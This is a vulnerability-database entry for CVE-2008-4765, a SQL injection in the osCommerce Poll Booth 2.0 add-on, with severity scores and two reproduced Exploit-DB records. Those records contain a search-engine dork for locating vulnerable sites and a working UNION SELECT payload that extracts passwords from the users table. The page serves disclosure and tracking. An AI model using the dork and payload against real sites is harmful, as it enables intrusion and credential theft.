CVE-2008-4765
published 2008-10-28CVE-2008-4765: SQL injection vulnerability in pollBooth.php in osCommerce Poll Booth Add-On 2.0 allows remote attackers to execute arbitrary SQL commands via the pollID…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.7th percentile
SQL injection vulnerability in pollBooth.php in osCommerce Poll Booth Add-On 2.0 allows remote attackers to execute arbitrary SQL commands via the pollID parameter in a results operation. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oscommerce | poll_booth | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pollbooth 2.0 - 'pollID' SQL Injection
exploitdb·2008-04-13
CVE-2008-4765 Pollbooth 2.0 - 'pollID' SQL Injection
Pollbooth 2.0 - 'pollID' SQL Injection
---
############################################
#
# Pollbooth v2.0 SQL Injection Vulnerability
#
############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : [email protected]
#
#############################################
#
# DORK 1 : allinurl: "pollBooth.php?op=results"pollID
#
#############################################
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
WEBSiTE>>>http://www.xcorpitx-hack.com/Forum/
********************S@BUN********************
# milw0rm.com [2008-04-13]
Exploit-DB
osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection
exploitdb·2008-04-13
CVE-2008-4765 osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection
osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection
---
source: https://www.securityfocus.com/bid/28752/info
osCommerce Poll Booth is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Poll Booth v2.0 is vulnerable; other versions may also be affected.
http://www.example.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
No writeups or analysis indexed.
http://packetstormsecurity.org/0804-exploits/pollbooth20-sql.txthttp://www.securityfocus.com/bid/28752https://exchange.xforce.ibmcloud.com/vulnerabilities/41796https://www.exploit-db.com/exploits/5436http://packetstormsecurity.org/0804-exploits/pollbooth20-sql.txthttp://www.securityfocus.com/bid/28752https://exchange.xforce.ibmcloud.com/vulnerabilities/41796https://www.exploit-db.com/exploits/5436
2008-10-28
Published